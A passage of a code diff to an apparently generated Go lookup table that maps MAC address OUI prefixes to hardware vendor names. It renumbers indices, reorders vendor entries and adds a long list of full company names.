Nintendo "e0e7bb": 4998, // Nureva "e0e8bb": 12143, // Unicom Vsens Telecommunications @@ -36346,7 +36346,7 @@ var ouis = map[string]int{ "e893f3": 12068, // Graphiant "e8944c": 5753, // Cogent Healthcare "e894f6": 81, // Tp Link Technologies - "e89505": 4321, // Shenzhen MiaoMing Intelligent Technology + "e89505": 4320, // Shenzhen MiaoMing Intelligent Technology "e89526": 339, // Luxshare Precision Industry "e89606": 9083, // testo Instruments Shenzhen "e8979a": 110, // Quectel Wireless Solutions @@ -36471,7 +36471,7 @@ var ouis = map[string]int{ "e8ded6": 1175, // Intrising Networks "e8defb": 12434, // Mesotic Sas "e8df24": 362, // Ohsung - "e8df70": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "e8df70": 4317, // AVM Audiovisuelles Marketing und Computersysteme "e8dff2": 2043, // Prf "e8e07e": 231, // Silicon Laboratories "e8e08f": 13322, // Gravotech Marking Sas @@ -37136,7 +37136,7 @@ var ouis = map[string]int{ "f0ae66": 305, // Cosonic Intelligent Technologies "f0af50": 12420, // Phantom Intelligence "f0af85": 4246, // Commscope - "f0b014": 4316, // AVM Audiovisuelles Marketing und Computersysteme + "f0b014": 4317, // AVM Audiovisuelles Marketing und Computersysteme "f0b022": 8488, // TOHO Electronics "f0b040": 322, // Hunan Fn Link Technology "f0b052": 263, // Ruckus Wireless @@ -37528,7 +37528,7 @@ var ouis = map[string]int{ "f4b549": 15628, // Xiamen Yeastar Digital Technology "f4b5aa": 11, // zte "f4b5bb": 8546, // Ceragon Networks - "f4b62d": 4320, // Dongguan Huayin Electronic Technology + "f4b62d": 4321, // Dongguan Huayin Electronic Technology "f4b688": 806, // Plantronics "f4b6c6": 62, // Indra Heera Technology LLP "f4b6e5": 1350, // TerraSem @@ -42782,12 +42782,12 @@ var vendors = []string{ "Zhen Shi Information Technology(Shanghai)", "RainX PTE", "VusionGroup", - "AVM Audiovisuelles Marketing und Computersysteme", "Shenzhen Tianruixiang Communication Equipment", + "AVM Audiovisuelles Marketing und Computersysteme", "Mellanox Technologies", "China Mobile Group Device", - "Dongguan Huayin Electronic Technology", "Shenzhen MiaoMing Intelligent Technology", + "Dongguan Huayin Electronic Technology", "Miwa Lock", "Netcraze", "Shenzhen Ruiyuanchuangxin Technology", @@ -42800,12 +42800,12 @@ var vendors = []string{ "Equal Optics", "JoulWatt Technology", "Handheld Scientific", - "Nokia Solutions and Networks India Private", "Brother Industries", - "Xi an Molead Technology", "Nautitech Mining", - "Voyetra Turtle Beach", + "Xi an Molead Technology", + "Nokia Solutions and Networks India Private", "Pleneo", + "Voyetra Turtle Beach", "Ela Innovation", "Clourney Semiconductor", "Beamtrail Sole Proprietorship", @@ -46638,13 +46638,13 @@ var vendors = []string{ "Shenzhen Sundray Technologies", "Vantiva Connected Home", "Beijing BitIntelligence Information Technology", + "TeamF1 Networks", "Jizaie", "BWS IoT", - "TeamF1 Networks", "Inseego Wireless", "Yingling Innovations Pte", - "Chameleon Technology UK", "Rong Paisa Electronics", + "Chameleon Technology UK", "Compal Informationkunshan", "Nexus Raytek", "Sapphire Brands", @@ -54129,15 +54129,15 @@ var vendors = []string{ "Rongcheeng Goer Technology", "Lavelle Network Private", "Inagile Electronic Technology", - "Prolights", "Panasonic Ecology", "nFore Technology", + "Prolights", "Douyin Vision", "ShenzhenEnjoyTechnologyCo", "IntelPro", "Valeo Schalter und Sensoren", - "DASAN Network Solutions", "Shenzhen Photon Leap Technology", + "DASAN Network Solutions", "ADT Technology", "PNetworks Electronics Information", "Origin", @@ -57709,13 +57709,19268 @@ var vendors = []string{ "Documentation", "IPv6 Multicast", "MPLS TP p2p", - "BFD for VXLAN", + "AllL2MI ISs", "PacketPWEthA", + "TRILL OAM", "BFD on LAG Interfaces", - "AllL2MI ISs", - "IPv4 Multicast", - "PacketPWEthB", + "BFD for VXLAN", "AllL1MI ISs", - "TRILL OAM", + "IPv4 Multicast", "Proxy Mobile IPv6", + "PacketPWEthB", +} + +var vendorsFull = []string{ + "Nokia Shanghai Bell Co., Ltd.", + "Extreme Networks Headquarters", + "Katun Corporation", + "Sagemcom Broadband SAS", + "Cisco Systems, Inc", + "Fiberhome Telecommunication Technologies Co.,LTD", + "Zebra Technologies Inc.", + "Micas Networks Inc.", + "Ingram Micro Services", + "Cyklop Fastjet Technologies (Shanghai) Inc.", + "Nabu Casa, Inc.", + "zte corporation", + "IEEE Registration Authority", + "Private", + "Espressif Inc.", + "Huawei Technologies Co.,Ltd", + "Sunplus Technology Co., Ltd.", + "Conprove", + "Tianjin Changdatong Technology Co.,LTD", + "HP Inc.", + "Cisco Meraki", + "New H3C Technologies Co., Ltd", + "Honor Device Co., Ltd.", + "Arca Technologies S.r.l.", + "Masimo Corporation", + "Intel Corporate", + "Edgecore Americas Networking Corporation", + "GN Audio A/S", + "Juniper Networks", + "Advance Security Electronics", + "Hui Zhou Gaoshengda Technology Co.,LTD", + "Sitehop Ltd", + "Sichuan AI-Link Technology Co., Ltd.", + "Lampuga GmbH", + "Nintendo Co.,Ltd", + "Luxul Tech Co., Ltd", + "Shenzhen SuperElectron Technology Co.,Ltd.", + "EM Microelectronic", + "Accuenergy (CANADA) Inc", + "Xiaomi Communications Co Ltd", + "Fortinet, Inc.", + "SmarDTV Corporation", + "AzureWave Technology Inc.", + "Shenzhen Phaten Tech. LTD", + "Dongguan YIMO Technology Co.LTD", + "DENSO Co.,Ltd", + "Bouffalo Lab (Nanjing) Co., Ltd.", + "Arcadyan Corporation", + "Apple, Inc.", + "Ubee Interactive Co., Limited", + "Hangzhou BroadLink Technology Co.,Ltd", + "Vantiva USA LLC", + "Texas Instruments", + "Hangzhou Hikvision Digital Technology Co.,Ltd.", + "Nurivoice Co., Ltd", + "Wuxi Xinjie Electric Co.,Ltd", + "Wistron Neweb Corporation", + "cloudnineinfo", + "Universal Global Scientific Industrial Co., Ltd.", + "Shenzhen Diyang Smart Technology Co.,Ltd.", + "eero inc.", + "Shenzhen Gooxi Information Security CO.,Ltd.", + "Indra Heera Technology LLP", + "Sophos Ltd", + "Shenzhen Kayan Electronics., Ltd.", + "Guangdong Oppo Mobile Telecommunications Corp.,Ltd", + "Taiyo Yuden Co.,Ltd", + "OnePlus Technology (Shenzhen) Co., Ltd", + "Microchip Technology Inc.", + "Kaon Group Co., Ltd.", + "Shenzhen Max Infinite Technology Co.,Ltd.", + "Haiguang Smart Device Co.,Ltd.", + "Amazon Technologies Inc.", + "Motorola Mobility LLC, a Lenovo Company", + "Halo Technologies", + "SINOBONDER Technology Co., Ltd.", + "Nokia", + "Unify Software and Solutions GmbH & Co. KG", + "Nevion", + "Phyplus Microelectronics Limited", + "leerang corporation", + "Tp-Link Technologies Co.,Ltd.", + "Edgecore Networks Corporation", + "Hailo Technologies Ltd.", + "Arista Networks", + "Samsung Electronics Co.,Ltd", + "Panasonic Automotive Systems Co.,Ltd", + "SMK corporation", + "Robert Bosch Elektronika Kft.", + "Palo Alto Networks", + "Robert Bosch GmbH", + "Uhtek Co., Ltd.", + "DMG MORI Digital Co., LTD", + "Uniway Infocom Pvt Ltd", + "VECOS Europe B.V.", + "Inventec(Chongqing) Corporation", + "Murata Manufacturing Co., Ltd.", + "Avikus Co., Ltd", + "Vodafone Italia S.p.A.", + "NETIO products a.s.", + "Marquardt GmbH", + "Shenzhen Skyworth Digital Technology CO., Ltd", + "Servercom (India) Private Limited", + "I&C Technology", + "Dell Inc.", + "Quickset Defense Technologies, LLC", + "Zyxel Communications Corporation", + "Hon Hai Precision IND.CO.,LTD", + "Visteon Corporation", + "Shenzhen TecAnswer Technology co.,ltd", + "Quectel Wireless Solutions Co.,Ltd.", + "Huawei Device Co., Ltd.", + "Kyungwoo.system, Inc.", + "Continental Automotive Technologies GmbH", + "Rockwell Automation", + "Earda Technologies co Ltd", + "Guangzhou Qingying Acoustics Technology Co., Ltd", + "DZS Inc.", + "Apollo Intelligent Connectivity (Beijing) Technology Co., Ltd.", + "Katch Asset Tracking Pty Limited", + "Lumacron Technology Ltd.", + "Flaircomm Microelectronics, Inc.", + "MitraStar Technology Corp.", + "Shenzhen Along Communication Tech Co., Ltd", + "Diebold Nixdorf", + "Ubiquiti Inc", + "HUMAX Co., Ltd.", + "Sony Corporation", + "Chiun Mai Communication System, Inc", + "Sichuan Tianyi Comheart Telecom Co.,LTD", + "Barrot Technology Co.,Ltd.", + "Inalp Solutions AG", + "Ruijie Networks Co.,LTD", + "E&M SOLUTION CO,.Ltd", + "Cloud Star Technology Co., Ltd.", + "Sony Interactive Entertainment Inc.", + "kuosheng.com", + "Yealink(Xiamen) Network Technology Co.,Ltd.", + "Siemens Industrial Automation Products Ltd., Chengdu", + "HMD Global Oy", + "vivo Mobile Communication Co., Ltd.", + "Selcom Electronics (Shanghai) Co., Ltd", + "Marquardt Electronics Technology (Shanghai) Co.Ltd", + "ADVA Optical Networking Ltd.", + "Asyril SA", + "Shenzhen Hohunet Technology Co., Ltd", + "Trig Avionics Limited", + "GOCLOUD Networks(GAOKE Networks)", + "Baidu Online Network Technology (Beijing) Co., Ltd", + "Mitsumi Electric Co.,Ltd.", + "Raspberry Pi Trading Ltd", + "Microsoft Corporation", + "Cableware Electronics", + "Alpsalpine Co,.Ltd", + "Everytale Inc", + "PETAiO (NanJing), Inc.", + "TCL King Electrical Appliances(Huizhou)Co.,Ltd", + "Itel Mobile Limited", + "Vutility Inc.", + "Sernet (Suzhou) Technologies Corporation", + "Beijing Xiaomi Mobile Software Co., Ltd", + "GD Midea Air-Conditioning Equipment Co.,Ltd.", + "Bosch Thermotechnik GmbH", + "Wuhan YuXin Semiconductor Co., Ltd.", + "Shenzhen SDMC Technology CO.,Ltd.", + "Allied Telesis K.K.", + "Accessia Technology Ltd.", + "Snorble", + "Harman/Becker Automotive Systems GmbH", + "NXP Semiconductor (Tianjin) LTD.", + "Npo Rps Llc", + "Tendyron Corporation", + "Mist Systems, Inc.", + "Cable Matters Inc.", + "Nokia Solutions and Networks GmbH & Co. KG", + "Gemtek Technology Co., Ltd.", + "ChengDu TD Tech", + "Shanghai Sunmi Technology Co.,Ltd.", + "Fibercentury Network Technology Co.,Ltd.", + "Qorvo International Pte. Ltd.", + "KAGA FEI Co., Ltd.", + "ML vision Co.,LTD", + "Suzhou Kuhan Information Technologies Co.,Ltd.", + "Open Infrastructure", + "Telechips, Inc.", + "Liteon Technology Corporation", + "Xplora Technologies AS", + "Realme Chongqing Mobile Telecommunications Corp.,Ltd.", + "Cloud Network Technology Singapore Pte. Ltd.", + "shenzhen Cloud High Communication Technology Co.,Ltd", + "Giax GmbH", + "Arounds Intelligent Equipment Co., Ltd.", + "WiZ", + "Robert Bosch JuP1", + "Florawise", + "Siemens Rail Automation SAU", + "Intracom Defense S.a.", + "Cambium Networks Limited", + "u-blox AG", + "VTech Communications Limited", + "PAX Computer Technology(Shenzhen) Ltd.", + "Sharetronic Data Technology Co.,Ltd", + "Lenovo(Beijing)Co., Ltd.", + "Google, Inc.", + "Celestica Inc.", + "Raisecom Technology CO., LTD", + "Shenzhen Orange Digital Technology Co.,Ltd", + "SONoC Corp.", + "Alcatel-Lucent Enterprise", + "Inodesign Group", + "Dolphin Electronics (DongGuan) Co., Ltd.", + "Calix Inc.", + "Multilaser Industrial S.A.", + "Tuya Smart Inc.", + "Zf", + "RafaelMicro", + "Chipsguide technology CO.,LTD.", + "SHARP Corporation", + "Cornelis Networks, Inc.", + "Aviva Links Inc.", + "Lucid Motors", + "Ericsson AB", + "Vestel Elektronik San ve Tic. A.S.", + "Chengdu Quanjing Intelligent Technology Co.,Ltd", + "Tecno Mobile Limited", + "Renesas Electronics (Penang) Sdn. Bhd.", + "Inventus Power Eletronica do Brasil LTDA", + "Askey Computer Corp", + "GoPro", + "Guangzhou Yuhong Technology Co.,Ltd.", + "BAE Systems Apllied Intelligence", + "Silicon Laboratories", + "Chengdu Jiarui Hualian Communication Technology Co", + "Shenzhen Ktc Technology Co.,Ltd", + "Xiamen IPRT Technology CO.,LTD", + "China Dragon Technology Limited", + "Prachi Enterprises", + "LG Electronics", + "Toshiba TEC Corporation Inc", + "RuggedTek Hangzhou Co., Ltd", + "Qingdao Intelligent&Precise Electronics Co.,Ltd.", + "Shenzhen SDG DONZHI Technology Co., Ltd", + "Frontier Smart Technologies Ltd", + "Zhejiang Tmall Technology Co., Ltd.", + "Hangzhou AlmightyDigit Technology Co., Ltd", + "Descartes Systems (USA) LLC", + "Digital Electronics Products Ltd.", + "Lyngsoe Systems LTd", + "CanTops Co,.Ltd.", + "WorldCast Systems", + "Guangzhou Shiyuan Electronic Technology Company Limited", + "Niigata Develoment Center, F.I.T. Co., Ltd.", + "Nextorage Corporation", + "IoT Security Group, SL", + "Adtran Inc", + "AltoBeam (China) Inc.", + "Intellics", + "Hill AFB - CAPRE Group", + "Hypervolt Ltd", + "Top-Unum Electronics Co., LTD", + "Zhidao Network Technology(Shenzhen) Co.,Ltd", + "Partner Tech", + "Beijing Sankuai Online Technology Co.,Ltd", + "Ruckus Wireless", + "Beijing Memblaze Technology Co Ltd", + "TCT mobile ltd", + "China Mobile IOT Company Limited", + "Sunnovo International Limited", + "IBG Industriebeteiligungsgesellschaft mbH &b Co. KG", + "Taicang T&W Electronics", + "Netlink Ict", + "InfiNet LLC", + "Dongguan Liesheng Electronic Co., Ltd.", + "Zf Cvcs", + "ZVISION Technologies Co., Ltd", + "Pc Lan Technologies", + "LG Innotek", + "Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd", + "Fujian Star-Net Communication Co.,Ltd", + "Compal Broadband Networks, Inc.", + "Heimgard Technologies AS", + "Signaltek Jsc", + "Shenzhen Furuilian Electronic Co.,Ltd.", + "Hifocus Electronics India Private Limited", + "Broadcom Limited", + "Shenzhen zediel co., Ltd.", + "AMPAK Technology,Inc.", + "Jiangsu Aisida Electronic Co., Ltd", + "OMRON Corporation", + "Omni-ID", + "UAB Teltonika Telematics", + "DreamBig Semiconductor, Inc.", + "Lootom Telcovideo Network (Wuxi) Co Ltd", + "Lumi United Technology Co., Ltd", + "Pioneercorporation", + "ALAXALA Networks Corporation", + "Samsung Electro-Mechanics(Thailand)", + "smartAC.com, Inc.", + "Phytium Technology Co.,Ltd.", + "BITSTREAM sp. z o.o.", + "Buffalo.inc", + "Edge Networks LLC", + "Shenzhen OXO Technology limited", + "New platforms", + "Siemens Ag", + "Cosonic Intelligent Technologies Co., Ltd.", + "Tozo Inc", + "DWnet Technologies(Suzhou) Corporation", + "Boxin Communication Co.,Ltd.", + "Sky Uk Limited", + "Shenzhen Toptel Technology Co., Ltd.", + "Ajax Systems DMCC", + "Lvswitches Inc.", + "Shenzhen Hanzsung Technology Co.,Ltd", + "GX International BV", + "Dongguan Lingjie IOT Co., LTD", + "Panasonic Connect Co., Ltd.", + "Shenzhen Shichuangyi Electronics Co.,Ltd", + "MirWifi,Joint-Stock Company", + "D-Link International", + "Seongji Industry Company", + "Valcom Co.,Ltd.", + "Hunan Fn-Link Technology Limited", + "EPCOMM Inc.", + "CableFree Networks Limited", + "Shenzhen Aiwinn information Technology Co., Ltd.", + "Xi'an LINKSCI Technology Co., Ltd", + "Shenzhen Fastrain Technology Co., Ltd.", + "KYOCERA Corporation", + "Guangzhou V-SOLUTION Electronic Technology Co., Ltd.", + "Shenzhen Sy-Fiber Optical Communication Technology.Co.,Ltd", + "Shenzhen Hankvision Technology CO.,LTD", + "Wyze Labs Inc", + "Synclayer Inc.", + "SonicWall", + "Huiwan Technologies Co. Ltd", + "Minibar Systems", + "Bull Hn Information Systems", + "Hisense Visual Technology Co.,Ltd", + "Luxshare Precision Industry CO., LTD.", + "Tellescom Industria E Comercio Em Telecomunicacao", + "Clevo Co.", + "Wacom Co.,Ltd.", + "Curvalux", + "Audoo Limited (UK)", + "Continental Automotive Systems Inc.", + "SkyBell Technologies Inc.", + "GN Hearing A/S", + "DBG Commnunications Technology Co., Ltd.", + "Austrian Audio GmbH", + "Grabango Co", + "Norma", + "Beijing Unigroup Tsingteng Microsystem Co., LTD.", + "Interphone Service", + "Nsolution Co., Ltd.", + "Fujitsu Limited", + "Liquidtool Systems", + "Continental Aftermarket & Services GmbH", + "Cofractal, Inc.", + "Shenzhen Shixuntong Information & Technoligy Co", + "Nanjing Maxon O.E. Tech. Co., LTD", + "EliteGroup Computer Systems Co., LTD", + "Ohsung", + "Laplace System Co., Ltd.", + "Shenzhen Yipingfang Network Technology Co., Ltd.", + "N-iTUS CO.,LTD.", + "Synaptec", + "Seiko Epson Corporation", + "PPT Vision, Inc.", + "WeLink Communications", + "PoLabs d.o.o.", + "2bps", + "Hangzhou Xinyun technology Co., Ltd.", + "Compal Information (Kunshan) Co., Ltd.", + "Elma Electronic AG", + "Momentum Iot", + "Sercomm France Sarl", + "Chongqing Fugui Electronics Co.,Ltd.", + "Bose Corporation", + "Motorola Solutions Inc.", + "Luxul", + "Wingtech Mobile Communications Co.,Ltd", + "Tiinlab Corporation", + "Max8usa Distributors Inc.", + "VG Controls, Inc.", + "Shenzhen Peizhe Microelectronics Co .Ltd", + "Malibu Networks", + "ASUSTek COMPUTER INC.", + "Arlo Technology", + "Nhnetworks", + "DongGuan Ramaxel Memory Technology", + "Vsolution Telecommunication Technology Co.,Ltd.", + "BHTC GmbH", + "NEC Platforms, Ltd.", + "Shaoxing Ourten Electronics Co., Ltd.", + "Nethesis srl", + "Shenzhen Chuangwei-Rgb Electronics Co.,Ltd", + "xiamenshi c-chip technology co., ltd", + "Tecnovideo Srl", + "Guangdong Taide Zhilian Technology Co.,Ltd", + "Sunitec Enterprise Co.,Ltd", + "SAXA, Inc.", + "Ao", + "Northwest Towers", + "ACTIVIO Inc.", + "Wanan Hongsheng Electronic Co.Ltd", + "Shenzhen Fanweitai Technology Service Co.,Ltd", + "Maytronics Ltd.", + "Cachengo, Inc.", + "Mirae Information Technology Co., Ltd.", + "Kyung In Electronics", + "Shenzhen TINNO Mobile Technology Corp.", + "Zalliant LLC", + "Sichuan Jiuzhou Electronic Technology Co., Ltd.", + "Mercury Corporation", + "Shenzhen Uvision-tech Technology Co.Ltd", + "Team EPS GmbH", + "Japan E.M.Solutions Co., Ltd.", + "Micobiomed", + "Sony Home Entertainment&Sound Products Inc", + "Iflytek Co.,Ltd.", + "ALL Winner (Hong Kong) Limited", + "JM Zengge Co., Ltd", + "Coosea Group (Hk) Company Limited", + "Oakley Inc.", + "Fn-Link Technology Limited", + "Routerboard.com", + "IT Access Co., Ltd.", + "RAB Lighting", + "Shanghai Imilab Technology Co.Ltd", + "Motorola (Wuhan) Mobility Technologies Communication Co., Ltd.", + "Infinix mobility limited", + "JiQiDao", + "Songwoo Information & Technology Co., Ltd", + "Shanghai MXCHIP Information Technology Co., Ltd.", + "Shenzhen Cultraview Digital Technology Co., Ltd", + "Elecom Co.,Ltd.", + "Iris ID Systems, Inc.", + "Hannto Technology Co., Ltd", + "Quintar Company", + "Acoinfo Technology Co.,Ltd", + "Remote Solution", + "Tech4home, Lda", + "Netgem", + "Beijing Venustech Cybervision Co.,Ltd.", + "Shenzhen Qihu Intelligent Technology Company Limited", + "We Corporation Inc.", + "Schrack Seconet Care Communication GmbH", + "Megasolution,Inc.", + "Sercomm Corporation.", + "UGame Technology Co.,Ltd", + "Xag", + "Garmin International", + "Rako Controls Ltd", + "LLC Proizvodstvennaya Kompania TransService", + "Mitubishi Hitachi Power Systems Industries Co., Ltd.", + "Avaya Inc", + "infomark", + "Asterfusion Data Technologies Co.,Ltd", + "Skullcandy", + "CaptionCall", + "Maxlinear, Inc", + "Quanta Computer Inc.", + "Itron Inc", + "DIRC Technologie GmbH & Co.KG", + "Ficosa Internationa(Taicang) C0.,Ltd.", + "ANDRA Sp. z o. o.", + "OCOSMOS Co., LTD", + "Shenzhen zhouhai technology co.,LTD", + "Chipsea Technologies (Shenzhen) Corp.", + "Motorola Solutions Malaysia Sdn. Bhd.", + "NEC Corporation", + "Intelligence Technology Of Cec Co., Ltd", + "Shanghai High-Flying Electronics Technology Co., Ltd", + "Shenzhen Teleone Technology Co., Ltd", + "Heat Tech Company, Ltd.", + "MofiNetwork Inc", + "Amino Communications Ltd", + "Chengdu Meross Technology Co., Ltd.", + "MADOKA SYSTEM Co.,Ltd.", + "STR Elektronik Josef Schlechtinger GmbH", + "T-Mobile, USA", + "Linkflow Co., Ltd.", + "Netlist, Inc.", + "Ziv", + "Zcomax Technologies, Inc.", + "worldcns inc.", + "Digita", + "Danlaw Inc", + "Intracom Asia Co., Ltd", + "Integri-Sys.Com LLC", + "Hitachi, Ltd.", + "silicom", + "Beijing Xiaomi Electronics Co., Ltd.", + "China Mobile(Hangzhou) Information Technology Co.,Ltd.", + "Zhejiang Dahua Technology Co., Ltd.", + "Netgear", + "ASCO Power Technologies", + "Wu Qi Technologies,Inc.", + "LG Electronics (Mobile Communications)", + "Volterra", + "Laird Technologies", + "Trilliant", + "Swissbit AG", + "Hitron Technologies. Inc", + "Shenzhen hechengdong Technology Co., Ltd", + "NIRIT- Xinwei Telecom Technology Co., Ltd.", + "BVBA DPTechnics", + "Freebox Sas", + "StreamCCTV, LLC", + "Zhen Shi Information Technology (Shanghai) Co., Ltd.", + "Tiandy Technologies CO.,LTD", + "Lv Solution Sdn. Bhd.", + "Shenzhen Yifang Network Technology Co., Ltd.", + "Hikari Trading Co.,Ltd.", + "Realme Chongqing MobileTelecommunications Corp Ltd", + "Yangtze Memory Technologies Co., Ltd.", + "KCF Technologies, Inc.", + "Nippon Dentsu Co.,Ltd.", + "Companies House to GlucoRx Technologies Ltd.", + "Veea", + "NVIDIA Corporation", + "Giga-Byte Technology Co.,Ltd.", + "Shenzhen Goodix Technology Co.,Ltd.", + "CyberTAN Technology Inc.", + "PS Audio International", + "Aloys, Inc", + "Gree Electric Appliances, Inc. Of Zhuhai", + "netKTI Co., Ltd", + "PCCW Global, Inc.", + "Panoptics Corp.", + "ASSA ABLOY Korea Co., Ltd iRevo", + "Prudential Technology co.,LTD", + "Procter & Gamble Company", + "Zhengzhou XindaJiean Information Technology Co.,Ltd.", + "Micro Electron Co., Ltd.", + "The Chamberlain Group, Inc", + "Integrated Device Technology (Malaysia) Sdn. Bhd.", + "Guangzhou BaoLun Electronics Co., Ltd", + "Vida Resources Lte Ltd", + "wanze", + "Hunan Keyshare Communication Technology Co., Ltd.", + "Shenzhen NVC Cloud Technology Co., Ltd.", + "Skyworth Digital Technology(Shenzhen) Co.,Ltd", + "Eidetic Communications Inc", + "Web Sensing LLC", + "American Micro-Fuel Device Corp.", + "Igt", + "Commonwealth Scientific and Industrial Research Organisation", + "Axe Group Holdings Limited", + "Gigafirm.co.LTD", + "Nebulon Inc", + "BYD Precision Manufacture Company Ltd.", + "Telink Semiconductor (Shanghai) Co., Ltd.", + "Chengdu Phycom Tech Co., Ltd.", + "Signify B.V.", + "WIO Manufacturing HK Limited", + "Shenzhen YOUHUA Technology Co., Ltd", + "NSS Sp. z o.o.", + "Umeox Innovations Co.,Ltd", + "SM-Electronic GmbH", + "Zioncom Electronics (Shenzhen) Ltd.", + "Hisense broadband multimedia technology Co.,Ltd", + "Doro AB", + "Systech Electronics Ltd", + "Shanghai Zhongmi Communication Technology Co.,Ltd", + "Shanghai Hulu Devices Co., Ltd", + "Tashang Semiconductor(Shanghai) Co., Ltd.", + "AEV, spol. s r. o.", + "Sevio Srl", + "Arista Network, Inc.", + "Movon Corporation", + "Hon Hai Precision Industry Co., Ltd.", + "Chengdu Qianli Network Technology Co., Ltd.", + "Selcom Elettronica S.r.l.", + "Hazens Automotive Electronics(SZ)Co.,Ltd.", + "Shenzhen Fenda Technology Co., Ltd", + "MARGI Systems, Inc.", + "Pegasus Technologies Inc.", + "China Mobile (Hangzhou) Information Technology Co., Ltd.", + "Hansong Tehnologies", + "California Things Inc.", + "Mitac Computing Technology Corporation", + "Axis Communications AB", + "ClearPath Networks, Inc.", + "Ring LLC", + "Antailiye Technology Co.,Ltd", + "Jiangsu Qinheng Co., Ltd.", + "Hosiden Corporation", + "Acubit", + "Hewlett Packard", + "Perinet GmbH", + "Advanced & Wise Technology Corp.", + "Sirius Electronic Systems Srl", + "Cgi It Uk Limited", + "Safety Vision, LLC", + "OnePlus Electronics (Shenzhen) Co., Ltd.", + "United Networks Inc.", + "I-O Data Device,Inc.", + "Lexmark International, Inc.", + "Flextronics Tech.(Ind) Pvt Ltd", + "Sycada BV", + "ChipER Technology co. ltd", + "Shenzhen Costar Electronics Co. Ltd.", + "NST Audio Ltd", + "Ciholas, Inc.", + "Inteno Broadband Technology AB", + "Z-meta Research LLC", + "Shenzhen DAPU Microelectronics Co., Ltd", + "VTech Telecommunications Ltd.", + "Studio Technologies, Inc", + "Holl technology CO.Ltd.", + "Layon international Electronic & Telecom Co.,Ltd", + "NetComm Wireless", + "SIMCom Wireless Solutions Co.,Ltd.", + "Fujian Newland Payment Technology Co.,Ltd.", + "Shenzhen Four Seas Global Link Network Technology Co., Ltd.", + "Atil Technology Co., LTD", + "Universal Electronics, Inc.", + "HWA JIN T&I Corp.", + "Suzhou Tremenet Communication Technology Co., Ltd.", + "Zegna-Daidong Limited", + "SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD", + "Lund IP Products AB", + "peiker acustic GmbH", + "Cermate Technologies Inc.", + "Burlywood", + "Kontron America, Inc.", + "Opulinks", + "iComm HK LIMITED", + "machineQ", + "Guangdong Genius Technology Co., Ltd.", + "Ivoclar Vivadent AG", + "LINE BIZ Plus", + "Pie Digital, Inc.", + "Ciena Corporation", + "Fitbit, Inc.", + "Yichen (Shenzhen) Technology Co.ltd", + "VTech Electronics Ltd.", + "Actiontec Electronics, Inc", + "Iton Technology Corp.", + "Siemens Canada", + "tide.co.,ltd", + "Sentec Co.Ltd", + "Shenzhen Bilian Electronic Co.,Ltd", + "ZettaHash Inc.", + "Wuhan Maxsine Electric Co.,Ltd.", + "ants", + "Amazon.com, LLC", + "Elgama-Elektronika Ltd.", + "Yst Corp.", + "TRUMPF Werkzeugmaschinen GmbH+Co.KG", + "Molex CMS", + "Best IT World (India) Pvt Ltd", + "Jiangsu fulian Communication Technology Co., Ltd.", + "Lenovo", + "Ficosa Electronics S.L.U.", + "Sontex SA", + "silergy corp", + "Magna Electronics Europe GmbH & Co. OHG", + "Resideo", + "Alien Green LLC", + "Shenzhen Jialihua Electronic Technology Co., Ltd", + "Lexar Co.,Limited", + "Hefei Radio Communication Technology Co., Ltd", + "Shenzhen Fenglian Technology Co., Ltd.", + "Ningbo Joyson Preh Car Connect Co.,Ltd.", + "Longconn Electronics(Shenzhen) Co.,Ltd", + "Wuxi Xiaohu Technology Co.,Ltd.", + "Cleondris GmbH", + "Hillstone Networks Inc", + "Xingluo Technology Company Limited", + "Mega Well Limited", + "Guangzhou Ava Electronics Technology Co.,Ltd", + "Inspiremobile", + "Withus Planet", + "Conspin Solution", + "XIAOMI Electronics,CO.,LTD", + "Shenzhen Kunlun TongTai Technology Co.,Ltd.", + "Ruichi Auto Technology (Guangzhou) Co., Ltd.", + "Varikorea", + "NXP (China) Management Ltd.", + "Open Mesh, Inc.", + "Atmosic Technologies", + "Yytek Co., Ltd.", + "e-Tek Labs, Inc.", + "Cloud Network Technology (Samoa) Limited", + "Bosch Automotive Products (Suzhou) Co. Ltd", + "DongGuan Siyoto Electronics Co., Ltd", + "Securitas Direct España, Sau", + "PT. Emsonic Indonesia", + "Inventel", + "Inventec Corporation", + "Sumitomo Kizai Co.,Ltd.", + "Gold3link Electronics Co., Ltd", + "3Com Europe Ltd", + "3Com", + "Ivs", + "Honeywell Environmental & Combustion Controls", + "Honeywell", + "Beijing HuaDa ZhiBao Electronic System Co.,Ltd.", + "Phicomm (Shanghai) Co., Ltd.", + "Kansai Electric Co., Ltd.", + "VVDN Technologies Pvt Ltd", + "Shenzhen Gongjin Electronics Co.,Lt", + "devolo AG", + "Compcontrol B.v.", + "Pico Communications", + "Compal Electronics INC.", + "DFM GmbH", + "Deutsche Telekom AG", + "ADVALY SYSTEM Inc.", + "Wuhan Tianyu Information Industry Co., Ltd.", + "Syntronic AB", + "AMICCOM Electronics Corporation", + "THE YEOLRIM Co.,Ltd.", + "Castlenet Technology Inc.", + "Stratec Biomedical AG", + "GE Healthcare", + "Beijing NeTopChip Technology Co.,LTD", + "Miura Systems Ltd.", + "Shenzhen Fanzhuo Communication Technology Co., Lt", + "Ufispace Co., LTD.", + "Micro-Star Int'l Co., Ltd.", + "Cascade Communications", + "Arcom", + "Hwh Co., Ltd.", + "Intent Solutions Inc", + "Card Access, Inc.", + "easynetworks", + "Mercury Communication Technologies Co.,Ltd.", + "CK Telecom (Shenzhen) Limited", + "Avira Operations GmbH & Co. KG", + "Peerbridge Health Inc", + "Weifang Goertek Electronics Co.,Ltd", + "Latecoere", + "JTEC Card & Communication Co., Ltd", + "Fihonest communication co.,Ltd", + "Shenzhen Libre Technology Co., Ltd", + "Human, Incorporated", + "Wistron InfoComm(Kunshan)Co.,Ltd.", + "Robert Bosch Gmbh, CM-CI2", + "Qorvo", + "Shenzhen Ateko Photoelectricity Co.,Ltd", + "JiangSu ZhongXie Intelligent Technology co., LTD", + "BoxLock, Inc.", + "Trex Enterprises", + "Stratus Technologies", + "Halong Mining", + "Git", + "Arrcus, Inc", + "UNIC Memory Technology Co Ltd", + "Conception Electronique", + "NARI Technology Co., Ltd.", + "L-3 Communications East", + "Shineway Technologies, Inc.", + "Nippon Electro-Sensory Devices", + "Blu-ray Disc Association", + "Elprotronic Inc.", + "Qingdao Haier Technology Co.,Ltd", + "99IOT Shenzhen co.,ltd", + "Scuf Gaming International LLC", + "PC Aquarius", + "G-Printec, Inc.", + "Systrome Networks", + "Lava International(H.k) Limited", + "Shenzhen Rf-Link Technology 